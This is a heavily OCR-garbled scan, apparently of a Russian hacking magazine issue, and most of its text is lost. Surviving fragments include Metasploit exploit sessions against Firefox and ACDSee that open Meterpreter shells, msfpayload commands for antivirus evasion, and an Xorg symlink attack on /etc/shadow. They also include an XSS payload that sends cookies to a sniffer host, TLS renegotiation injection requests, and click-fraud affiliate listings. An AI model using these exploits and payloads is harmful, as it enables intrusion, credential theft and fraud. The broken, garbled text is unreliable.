: 1. gogoCLIENT lgogonet.gogo6.com/
pof il e/gogoCL I ENT). 2. ,
Conect>> .
, n , - 1Pv6-pecypc !n, ipv6.goog le.com). . - n 3653. . ,
1v4- n 1Pv6. 1v6- , : 1. lg ogonet.gogo6 .com/page/feen et6-
egistatio ), feenet6 . 2. > , . 3. > .
1v6-, - no n test-ipv6 .com. - n .
feenet6 - lusename.boke.feenet6 . net). , n n plain-text'e. , Advanced PASS DSS 3DES1 Digest MD5.
IPV6 feenet6- , n 1v6-,
. , , , !n, ). , - . , n 1 , . ::::
/ EASY GreenDog , Digital Security ltwi tter.com/a ntyurinl
SMS ii'J.!i
- ! , IDS, DMZ, PDF - ,
.~ , SS-, . ,
SMS. , , . (
). - , . :) - Smsglobal [www.smsgloba l.com). , -
WINDOWS
, Windows 7/2008, , , ,
, .
1. n . 2. :
. {ED7BA47e-8E54-465E -82 5C -99712e4EelC}
- , ,
. , EasyHack. :)
-
n 25 SS- . , [ fs 7 Sende 10) . ! n , n n
. n no , n nn, n n SMS 1 . ,
n , SMS. n, -
e-mail, - n SMS. , , ,
- .
OQ j i;;.-Desl:top~llgoods ni!n.
* ,6"- w 1t110t11 \1 .. . .. tn {3) t6141l ~ AiroN.:oe~npo~e~rwoc-Ao:olllllllrrtiOC~ntlle.t AI!'Ony
, - . , - !- . !! , ,
. , -. , . ! ,
- . ,
. XXI ! -, - . :1 thn- Findmyhash lcode.google.com/p/f indmyhashl. ,
-. >>, .
:
python findmyhash_v1.1.2.py MD5 -g \
  -h a2Sb2?1eba9de114~9adc7dfbea7235

python findmyhash_v1.1.2.py NTLM -f hacked_domain.txt
RDP
, - , , , , -
, . , , , . ,
, , .
. RDP- Windows . RDP , 6- [ Vista Sv 20081.
, d-.
. , ? Default.dp, [, RDP 61.
, passwod .
, CyptUnpotectData[J cypt32.dll . , [ !.
, , , SID , .
EASY
: -h- ; -f- ; -g- Google.
, .
MDS NTLM-xwe
- Cain&Abel [www.ox id .i t l.
Remote De sk top Passwo d Decode d-. & .
, MSF . d .
MSF, :
1. mtt . 2. st-:
~ Defoult.rdp Notepa.d
d-
1 EASY
SSLV-
HTTPS. mai - t he-mi'dd l e SSL- , SS Lv3/ LS. - , BEAST -
. : , , ap-spoofig.
- SSL
[ ap-spo of i g ). . ? SSL. 2009 - TLS/55Lv3 eegotiatio vul [CVE-2009-35551 . , [ ,
) . , 10 % [ : www.ssllabs.com/ssld/aalyze.htmi l .
. , , , . , :
11 TLS hadshake [ 11 .
1.1 LS [ 2) .
1.2 2.
2) [ eegotiatiol. ) 1, ,
2 [ Sessio \0, , 1 21.
[Diagram: TLS renegotiation attack between Client, Attacker and Server. The attacker holds the client's handshake (session #1), opens its own TLS session #2 with the server and sends commands of its choice; renegotiation is then triggered and the client's handshake continues inside the encrypted session #2, so the attacker's earlier data is prefixed to the newly sent client data, which the attacker itself cannot read or manipulate.]
. 4) ,
1.2, , 3.
, , >> . , , [ 1.1 1.21. [gtitil [ 21 [ 31.
. [
:11- ? TLS- [Sessio \0) .
, >> . , .
. [ 11 [ 1.11. ,
[ 3), .
? , , [ , ) . [www.g-sec.lu/pacticaltls . pdf ).
. -, SSLv3/TLS, HTTPS, FPS, SMTPS, 35 . . , . ? . ,
- . , ,
~~ M isceii
. , . , : 1. URL. , CSRF, G-. - heade
ijectio.
1) uiae 1. 2 GET /path/to/resource.jsp /1. Ignor-me: 2) , ,
: GET /path/to/resource.jsp HTTP/l.e
Igore-me: GET /index.jsp /1. Cookie: sessionCookie=Token
2. Redirect HTTPS . sslstip . HTTPS.
, , . , sslstip -
. SSL eegotiatio :
EASY
, ( 1.2):
GET /url_that_will_e2_to_HTTP Ignore-what-comes-now:
3. XSS. w- TRACE, JavaScipt-o.
1.2 : TRACE / /1. X:This cotent will refiected i the respose to the cl
ietalert('XSS') X-igore:
. . Pytho, . :1 ,
, - - (www. ss ll abs . com/ssld/a alyze . html), ssltest, BackTack 5, ssltlstest .
100 /- , XOR METERPRETER IJ.liaf.ir.:i
mtt Metasploit (www.metasp loi t. )- . , , mtt
. , - - ( ), -
. mtt, - - . .
. ... , .
MSF msfpayload - ,
. :
. .(avastl -~ -- -~-----
.... , "D:\prj\av_test\test_3.exe" . '"
, 3
:
1 :
:
XOR rocks! Avast
#msfpayload windows/meterpreter/bind_tcp R 1 msfencode \ - 5 x8/shikata_ga_nai -t - test_.c
: windows/meterpreter/bind_tcp- MSF;
R - ; msfecode- ;
- 5 x86/shikata_ga_nai- payload ; -t - : ;
- test_.c - .
msfencode, , . msfpayload R, stage- , (mtt- -). , , . , MSF payload , . msfpayload - ( l.
- -, , . ! main - MSF,
. :
int mai ( int argc, char **argv) {
int ( *fuc) (); fuc=( int (*)()) buf; ( it )( *func) ();
/ EASY
(int arqc, char arqv)
int i; f (i=O;i
/
, ! , , ,
. , !
1 Apache mod_proxy CVSSV2 5.0
[]]I3] : 11 2011 . : Rodigo s . CVE: CVE-2011-3368.
[AV:N/AC:L/Au:N/C:P/I:N/A:N]
!, Nginx Squid], Apache ,
mod_poxy. -
!, ], , . , mod_poxy,
.
1:i RewiteRule PoxyPassMatch -, , -. Apache . .
, - :
RewriteRule (.*)\.(jpg|gif|png) http://images.example.com$1.$2 [P]
ProxyPassMatch (.*)\.(jpg|gif|png) http://images.example.com$1.$2
, . :
GET @other.example.com/something.png HTTP/1.1
-, , :
http://images.example.com@other.example.com/something.png
, othe.example.com, images.example.comra . URI lraothe.example.com/something.png /1 .1 1
, n
livinside.iogspot.comJ 1115612, . , .1]
400 Bad Request. n SECFORCE . n : goo.gi/Ob6yV. mod_poxy n
, IDMZ]. , Apache ! Apache, ,
]. n , :
python apache_scan.py [options] [options]
-r: Apache -: n, Apache ( 80) -u: URL ( /) -d: (DMZ) (
127. . .1) - : n DMZ ( single port scan) -g: GET-anpoc DMZ ( /) -h:
:
python apache_scan.py -r www.example.com -u /img/test.gif , DMZ python apache_scan.py -r www.example.com -u /img/test.gif
-d internalhost.local , DMZ python apache_scan.py -r www.example.com -u /img/test.gif \
-d internalhost.local - se -g /accounts/index.html
if.!;ldjfi Apache Sv 1.3. 1.3.42; Apache Serve 2.0 . 2.0.64; Apache Serve 2.2. 2.2.21.
JOi,J!iijiI mod_poxy
lgoo.g l/xNiqR]. , RewiteRule :
RewriteRule /(.*)\.(jpg|gif|png) http://images.example.com/$1.$2 [P]
2 Xorg CVSSV2 5.7
[AV: L/ AC:L/ AU : 5/:/1: / A:PI
: 28 2011 . : vladz . CVE: CVE-2011-4029.
vladz g, /tmp/.tX-lock [-
Xl. .
, - .
1I g /tmp/.X -lock . - : [! /tmp/.tX -lock O_EXCL PID, /tmp/.X-lock, . /tmp/.Xn-lock. , , . , chmod[l
, , /tmp/.tXn-lock , !l.
, /tmp/.tXn-lock open[l [ 2961 chmodll [ 3181.
, , ... g [ l, [ 341 1 , chmod[l? :
# strace :1 [ .. . ] open("/tmp/.tXl-lock", O_WRONLY[O_CREAT[O_EXCL, 44) wr:i..t.e(e, " 2192\n", 11) chmod("/tmp/.tX1-lock", 444) =
, SIGSTOP SIGCONT, . ,
. , :
ACDSee FotoSiate 4.0. Access Vi ol atio. 5 -
1. - [PID nl. 2. , SIGSTOP
/tmp/.tX1-Iock. , chmod[l.
3. /tmp/.tX1-Iock.
4. /tmp/.tX1-Iock -> /etc/shadow. 5. SIGCONT, chmod[l
444 /etc/shadow.
, , -,
, . - : /tmp/.X1-Iock -> /dontexist. - FataiEo[l.
exploit-db.com, 10- 18040. :
I]!'I . xcomoq_. ~ _xch_mpd ~n:;s. . /xchqg [ /} /J1] ( .. - .l'e.t _cjshadow)
i . ls -1_ 1 etc/ sha_dow _ -rw-r----- 1 roat sh_adow 187.2 Aug 7 e_7:1e_jetc/shadow $ .Lxchmod [ +] Trying to stop )(Qrg p_roc_e_ss right before chmod () [+] Process ID 4134 stopped (SIGSTOP sent) [ + ] __ Rei119V_ing /tq/. tx1-lock launching another Xc:Jrg process [+] Creating evil sylink (/tmp/ .tX1-lock -> /etc /shadow) [ +] Process ID 4134 resumed (SIGCONT _sent)_ [ +] Attack succeedec!, ls -1 /etcjshadow: __ -r--r-cr-- 1 root shad()w 172 Aug 7 H7:1e .. /.etcist)adoi>!
lt1;11Jf1 g 1.4 1.11.2. g 1.3 USE_CHMOD.
'iJ!IijiI g 1.11.2 1.12 .
Array.reduceRight 6-6 Mozilla
Firefox CVSSV2 10.0
[AV:N/AC:L/Au:N/C:C/I:C/A:C]
: 13 2011 . : Chis Rohlf, lvnitskiy, Matteo Memelli, dookie2000ca,
si3, m _me, TecROc. CVE: CVE-2011-2371.
Metasploit, Mozilla Fiefox 3.6. ,
educeRight[l .
1I educeRight callback : [ iik-l, , , -
/
Firefox 3.6.16. (generic/debug_trap)
. iik- l ), .
educeRight JS- _t js. . 2740 Aay.Length :
jsuint length;
if (!js_GetLengthProperty(cx, obj, &length))
    return JS_FALSE;
js. 2767. JavaScipt-oe educeRight, start, end step .
jsit ! ) .
jsint start = 0, end = length, step = 1;
switch (mode) {
case REDUCE_RIGHT:
    start = length - 1, end = -1, step = -1;
start = length -1 , start , length- . JS-
, , :
~/head> var myobject = document.getElement8yid( 'd' );
function spray() { 1/ ...
}
spray(); obj = new Array;
obj.length = 2197815382; f = function trigger(prev, myobj, indx, array) {
alert(myobj[ e]); obj.reduceRight(f, 1, 2, 3);
spayll heap spaying ASLR. R-:
181F1886 1e1F188
183E8D78
183E8D7D
1D8 1D83
141 14
1846917 1846918
12 121
1e2Eeees 16
181F1886 1elF18e7
18283481 18283482
121
78891 > 78893 78894 78896 78899 7889 7C889AEF 7C889AF2 7C889AF4
7C889AF9 7C889AFA
18838768
; RETN
V ESI,DWORD PTR DS:[EAX] ; kernel32.Virtua1Alloc
RETN
8 xul.18838768 RETN
8 RETN
EDX RETN
xul.184C26Fe RETN
EDI xul.182AC881 RETN
RETN
PUSHAD RETN
RETN
MOV EDI,EDI xul.182AC881 PUSH 8 MOV E8P,ESP PUSH DWORD PTR SS:[E8P+14] PUSH DWORD PTR SS:[E8P+18 ] PUSH DWORD PTR SS : [E8P+C] PUSH DWORD PTR SS:[E8P+8] PUSH -1 CALL kernel32.VirtualAllocEx ; // ; 8
REN 18
JMP ESP ; payload
Metasploit.
msf > use exploit/windows/browser/mozilla_reduceright msf exploit(mozilla_reduceright) > set payload windows/ meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(mozilla_reduceright) > set lhost 192.168.8.121 lhost => 192.168.8.121 msf exploit(mozilla_reduceright) > set uripath test
n n mod_proxy
uripath => test msf exploit(mozilla_reduceright) > exploit [ *] Exploit running as background job. [ *] Started reverse hand ler on 192.168..121:4444
( *] using URL: http: ;;e.e.e.e:sese; test [*] Local IP : http ://192.168.e.121:8e8e/ test [ *] Server started . msf exploit(mozilla_reduceright) > [*] Sending exploit to 192.168..123:174 .. . [*] Sending stage (752128 bytes) to 192.168 . .123 [*] Meterpreter session 1 opened (192 . 168..121:4444 -> 192.168..12:175) at 211-1-17 18:2:4 +4 [* ] Session ID 1 (192.168 . .121:4444 - > 192.168..123 : 175) processing InitialAutoRunScript 'migrate -f' [*] Current server process: firefox.exe (1992) [*] Spawning notepad.exe process to migrate to [+] Migrating to 1652 [+] Successfully migrated to process
if.1 ldjfi Mozilla Fiefox 3.6.16, 3.6.17.
, .
ACDSee FotoSlate id, L- CVSSV2 10.0
ll1:iim : 10 2011 . : Pavez w, jua vazquez. CVE: CVE-201 1-2595.
[AV:N/AC:L/Au:N/C:C/I:C/A:C]
ACD FotoSiate- , ,
46 57. ,
. 12 , , Metasploit, . , ACDSee FotoSiate 4.0 ! 146)
id Stig, . L- ACDSee FotoSiate
. S- . --t, , . 263557 ipwssl6.dll.
:
msf > use exploit/windows/fi leformat/acdsee_fotoslate_string msf exploit(acdsee_fotoslate_string) > set payload windows/ exec payload => windows/exec msf exploit(acdsee_fotoslate_string) > set cmd calc . exe cmd => calc .exe msf exploit(acdsee_fotoslate_string) > exploit [ *] Creating 'msf.plp' file . . . [ *] Generated output file /home/ pi kofarad/ .msf4/data / exploits / msf . plp
, ! ) .
jf.!;ldjfi ACDSee FotoSiate 4.0 Bui ld 146.
,_i,]!liiiI , . ::
g
, qweeqweqweewq [ alias sygwoc5eqwlbwfv ) [ )
[ 1 [ )
(http //httpz net) n (http.//152 137 21 . 112) ip
XS S
ur1 xss
!
-8 [ 1
[ email 1
n (http:l/site.com/xss.php?id=">)http://site.comlxss.php?id=%22%3E ( xss ). javascript , n
ur1 r , I., _ .:_fr_a_~s~t> ,_ ., .. _.
, - - stip_tags[J, . ,
. , :
6~1:
?
JS- SS- . ' :
! l, , .
. , , , ? - 20-30 JS- , .
JS ->> :
var servers = [ 'http://freel.hostl.com/' 4 'http://free2.hostl.com/' ,
'http://free.hostl.com/' ,
'http://freel.hostS.com/' , 'http://free2.host5.com/' , 'http://free3.host5 . com/' ]; for ( var key in servers) {
}
document.getElemetByid( 'footer' ).innerHTML += 'cscript src="'+servers[key]+'">' ;
if (loaded){ break;}
if (loaded){ .. . }
loaded, , . , , . ,
. - . ,
, . ,
logs.txt, .
-------lr~
-
2130000
, ,
XSS:
$_SERVER['HTTP_USER_AGENT'] - ;
$_SERVER['REMOTE_ADDR'] - I-;
$_SERVER['HTTP_REFERER'] - ( n );
date("d.m.y H:i") - ;
urldecode($_GET['c']) - n ;
$_SERVER['QUERY_STRING'] - .
, stip_tags!l. , Django, . , n , SS-. , ,
, , .
, , - ,
.
, , L-. . XSS , - . . :
c!>chtml>
, - , , , , - . !,
- demotivatos.u L- l ). ,
, , , -.: - )
!
XSS DEMOIVATORS.RU
XSS , . : 1. - XSS
, vkontakte . u , ma il. u , d .u . . XSS ,
. , d emo ti vatos. u .
, XSS :
Jl "" function (){ return new Image();} var xss_l;n(), xss_2;n(), xss_;n(), sniff ; 'var ; new Image(); x.src ; "http://tvoi.sniffer.comj?c;"+ escape(document.cookie); ~
// n XSS n "" xss_l.src ; 'http://_sitel.ru/search. php?q;">'+sniff+'' ; xss_2.src ; 'http://site2.ru/search. php?q;"> ' +sniff+' ' ;
xss_.src ; 'http://site.ru/search. php ?q;" > '+sni ff+' ' ;
[-
2. . n: no
, , n, , n JavaScipt-o, XSS div-co,
, . n, n
:
n :
window.onload = function() {
    document.getElementById('banners').innerHTML = '';
}
3. n n . n
JS + , n n n
. n: n JS-, n, JS-n
n , action n n.
!, nl n n tin-.
!n, ! . 4. n
n pop-unde pop-up. n
, n. 5. n
ifame. , n .
6. - n n JavaScipt :
document.getElementById('id_dema').src = 'http://host.ru/podmena.jpg';
7. : ifame !n
!. 8. n
JS-.
{xss}- javascipt-o . , . .
, , . , AJAX. , ,
- HTML + JS. ,
. .
, . , - . SS-, , .
, n- n , , , . ,
. . :
<!DOCTYPE><FRAMESET onload="{xss}">
, , . :
<!DOCTYPE><FRAMESET onload="{xss}" style="display:none;">
.
, l l.
>>, XSS - .
, ,- , demotivatos.u.
. : 500 .
12 1180 !,
. , . ! ::
- DBMX
..........
, ,
, -
! ,
.
www.master-x.com -
.
www.aofuckbjz.com -
-.
www.rxpblog.com -
.
(
)- , . - , .
. , . , . - ,
. , , , . ,
, , .
:
-
, - ,
.
.
, .
,
, .
() . , ,
, -
,
.
( ) , -
,
, ,
lg_eeics,
, ] . ,
, , , ,
.
- - , ,
30-50% .
,
- . -, ,
. l, , ] . .
, . .
! ].
. , .
- ,
, :]. , .
: :
:
, - .
- .
, , , .
, , . - .
.
Phamcash.com RX- Pates . iz Stimui-Cash.com OXOetwo k.com
201 2006 2006 2007
/ -: 40% , 30- 50% ! 75% 70% 100 - 45%, ] 300 - 50%
, , , , , , . , ., . , ., ., , , , , , , . , ., ., .
Visa, M asteCad, Visa, MasteCard, , Visa, MasterCard, , Visa, Euro D eit, , Wire , Wire Wire, MoeyGram Wire, M o eyGram
$100 $100 $50 $1 00 / ,
-
, - 110 ], - ! ,
]
-
. t >> .
. , , x h amste.com ,
. , .
, ? , -
. , ,
. $30.
- 40-60%.
, . , .
[ l, .
- ,
. , . [ !,
.
, [!. WodPess >> .
- .
FGH [ ,
/ -
-
/
Royai -Cash .com
2001
50-60% $30-40
44
check, wie, n, , WebMoney, Paxum, eCoin
EanCoin . com Aepatneship.com
2003 2003
50% 50%
23 173
check, wie, wie, n, WebMoney, Paxum, WebMoney, Paxum, eCoin, ePese eCoin
$100 $100
: :
:
l. , FGH . , - , , , .
.
FeoCash.com CashManiacs.com
1999 2003
50% 50%
58 128
Paxum, check, wie, ePaySevice WebMoney, Paxum,
ePaySevice
$300 $50
( PER CLICK) . cl ick- . - ' , - .
! ), , . , . , ,
. Iid) , l) . , , , , - . - . , id , .
, , .
,
. , .
:
. ,
.
, ,
! -
, ).
,
. - .
Bidtaffic.com Click9.com
2004 2008
/ - 70- 95% 70%
$40 $50 - ePasspote , Epese,
PayPal, Webmoney, StomPay, Wie EPESE, WebMoney
Peakclick.com Daoclick.com
2005 2009
70% 80%
$100 $50 Wi e , Webmoney, ePassporte, ePassporte, Westen Union, EPESE, WebMoney PayPal, Wire
: :
:
Thegreenppc.com Bizzclick.com
2009 2009
80% 75%
$50 $10 Webmoney, Wire, ePassporte, PayPa l, PayPal StormPay, EPESE,
Visa, MasteCard, Western Union, PayPal, Wire, Liberty Reserve, WebMoney
: :
: & .
: : : ' ,
. - , , . ,
. - . , .
! !, , .
/ - -
/
Glavtog.com
2010
!! 25- 35%
Webmoney, Epass, PayPal, Wie
$100
n n n n
-. , , : -. , ,
.
,
XML , .
.
, .
Stimui-Cash.com Affiliate-pogam . Amazon .com KingsPofit .com
201 1996 2010
!!
!!
25% 4- 8% 25%
Webmoney, Epass, PayPal, Check Webmoney, Wie Wire, ePesee, Moneybookes
$50 $10 $100
Appearance
Plugins
JAVASCRIPT
[Screenshot: Firefox add-ons list showing BetterPrivacy 1.66, Download Manager Tweak 0.9.5, Flashblock 1.5.15.1 and NoScript 2.1.2.5rc1]
. life4u apoo la. e . faronovlagm ail . com l
AdSense 10 .
. , .
078
www.qoogle.com/ ~-Google AdSese; direct.yandex.ru .; www.spybox.com. !li.-
- SpyBox; www.adwatcher.com -
Adwatcher; ~- ; l!iYti.ll&r!l - Piwik; www.qooqle. com/anaJytics/ .
[ . click f aud - )- , [ ) . [ , , ), [ - ) . , 10-15 % .
, . - -.
, . , . ,
. AdSese . , >
. , ,
SpyBox
n-, $0,1 ] . : n n , nR,- - ! t~R nn n. n n
n n t~R, n n ~ t~,
n . n, n, n R . n n .
, .
n . n .
n -n IPay-peCiick- n, n ,
High Threat .. Heat l
: R AdSense
[Chart: unique clicks, clicks, actions and sales over the selected timeframe]
- Adwatcher
n , ] . n , n . ! , IP n n ).
n , n .
, n n , n n ,
. n ,
n . 1. n I- ,
n, - . , I n .
2. n, n n , , :
, n nn , n .
Click
.
?
n: n -n ? n , n / n . , n. 2007 n Yahoo! n .
Checkmate Strategic Group. n Yahoo! n n
2004 . 2006 Google 90 . n n nn
, , n n
n .
. n, n , n [ , n , ), : n- n
. 4. n ,
, . n . :
n, n [n, - n ),
n , n 100. n n
n. 5. n
, n n n .
: SPYBOX , n . n n n
. , n/ n, , n
. n , 100% , n [ , n ) .
n - n SpyBox. , n -, n n, n n, n n, , , - .
n: n n L-,
n . n [ ):
var script = document.createElement('script');
script.type = 'text/javascript';
if (localStorage.spybox) {
    var spybox_hash = 'a181a603769clf98ad927e7367c7aa51';
    var spybox_session = localStorage.spybox;
    script.src = 'http://ua.robotreplay.net/fast.js';
}
document.getElementsByTagName("head")[0].appendChild(script);
n , n , n .
n n : n , n ,
- n. n n, n . , IP n
n n n [ n n n , - ),
. n . n, SpyBox
: n n n [ 1000 ), n [ n , n , ,
n ) .
ADWATCHER SpyBox, , , . , n
, , ? Adwatcher, , SpyBox,
!
, ,
nn . , ! 2003 n , n Google 150 . , n, n
, Google Clique , n Google . , Google n,
n . , n, . , , n
2009 . Microsoft , , n Microsoft. 750 . - . , ,
.
[Screenshot: AdWatcher campaign setup form with the fields Campaign, Search Engine, Group, Landing Page and Cost]
. - [ IP) [ , , , , , ).
[ ) 3D- . , faud ts ,
. ,
, [ , ) :
document.write( ' ' );
, . Adwatche 30
. , , ,
, Adwatche SpyBox.
: AdSense
[Screenshot: AdWatcher dashboard with general information and October statistics (clicks, actions, sales, profit)]
- Adwatcher
, Google Analytics
, : Google Analyti cs Piwik [ -, ). , ,
, . : , ,
. , ,
[ 40 , ), ,
. > . ,
. , , -
. , - . ,
, .
, [ , ) .
,
. , , , , , :). I
Mar licq 884888, http://snipper.rul
: 54luR4
URL: il lylpxtMKi
: 'nix/win
: Gremwell
URL: www gremwell com
: nix/win
- , n , ,
m? n ? ,
MagicTee. n n n .
IWAF, Acuetix, OpeVAS, Nessus, u, m . .), n n
!n, m ikto) IHTML, MS Wod .) .
!) ,
, Magic !)- n n , n
n ,
. n n ,
n n , www.gemwell . com/ documetatio .
ALANA K!LLR , n
- Apache l bit.ly/gvHB i ), , n . n
n , n , n
t l K!LLR
S4luR4 n n -. n n , n
n. , n
: Danijel MaXoNe URL:
it ly/orsgKn
: Windows 2000/
/2003 Server/ Vista/2008 Server/7
/
n/- / n SQL-oa, n MaxSQLi Sytax Builde, n SQL-. n SQLi,
n based. :
; n
UNION; WAF n ;
; ;
n ;
n; , ;
n stig itege based.
, n , n , , n ,
n SQL-.
X-Tools
killapache.pl Kigcope. n -- , n
. S4luR4 + cURL l , n !, , . .).
: G-
lbyte gs) , n n.
: VaZoNeZ
URL: yazonez com/(;lage/
-- --
.llig.an.Q -t~
: Windows 2000//2003 Server/ Vista/2008 Server/7
n , n ,
. , ,
n . nn n Stegao, .
n , : 1.
-
. , ,
- ,
. - .
notepad2.exe J
" w n "0-m - ~ ~1*1
Kpaw
, , . , - , -. ;1.
, -. n
, . .
, , ,
-, . .
, , . ,
. ,
.
1. Kaspersky Crystal . . Kaspesky Cystal-
-
- - i" Dr Web Scanner FLY-CODE, , , .
3. ESET NOD32 Smart Security 5. - ESET NOD32 Smat Secuity 5. ,
.. , , >,
. 4. Avast! Free Antivirus.
- Avast! F Antivius. n, ,
.
n n
. , . - n .
, n n n .
n. n , API, n
, n , .
,
n LL-. , ,
. , .
Pinch. - ,
. Toja-PSW.Wi32.LDPinch.dlt, D. Web- Tojan.Packed . 1197, NOD32- Win32/PSW.LdPinch.NMJ, Avast , Win32:LdPinch-NO [j]. ,
n otepad.exe. , .
ii:Wi~ .
MZ- -, . - - otepad.exe. - , ,
I- .
Kaspesky Cistal. - . > . NOD32 Smat Secuity , Win32/PSW.LdPinch.NMJ.
Avast , , .